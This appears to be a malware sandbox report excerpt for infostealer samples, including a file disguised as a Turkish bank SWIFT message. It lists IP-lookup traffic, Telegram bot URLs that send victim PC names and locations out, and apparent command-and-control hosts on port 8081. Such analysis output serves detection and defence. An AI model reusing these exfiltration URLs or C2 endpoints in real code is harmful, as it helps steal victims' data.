Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:707748%0D%0ADate%20and%20Time:%2007/03/2025%20/%2022:52:54%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20707748%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:707748%0D%0ADate%20and%20Time:%2008/03/2025%20/%2005:19:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20707748%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Mar 2025 22:05:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 06 Mar 2025 22:05:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Native_snake01.exe, 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.000000000271C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Native_snake01.exe, 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Native_snake01.exe, 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Native_New-Nova.exe, 00000009.00000002.2956686994.00000000026BC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.000000000250A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Native_New-Nova.exe, 00000009.00000002.2956686994.00000000026BC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2956686994.00000000026AA000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.000000000250A000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Native_New-Nova.exe, 00000009.00000002.2956686994.000000000263B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.0000000002489000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Native_New-Nova.exe, 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Native_New-Nova.exe, 00000009.00000002.2956686994.00000000026D8000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.0000000002526000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1750593373.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2956686994.000000000263B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, BZTCUCKTKd.exe, 0000000C.00000002.1791778716.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.0000000002489000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Native_snake01.exe, 0000000A.00000002.2956341043.0000000002451000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp, Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756666228.0000000005CE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Ziraat_Bankasi_Swift_Messaji.png.exe, 00000000.00000002.1756797187.0000000006DB2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Native_snake01.exe, 0000000A.00000002.2956341043.0000000002539000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002668000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.0000000002539000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002668000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Native_New-Nova.exe, 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: Native_snake01.exe, 0000000A.00000002.2956341043.0000000002539000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002668000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Native_snake01.exe, 0000000A.00000002.2956341043.0000000002539000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002668000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:707748%0D%0ADate%20a
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Native_snake01.exe, 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Native_New-Nova.exe, 00000009.00000002.2956686994.00000000026BC000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.00000000024A0000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.0000000002539000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.000000000250A000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002668000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.000000000263F000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
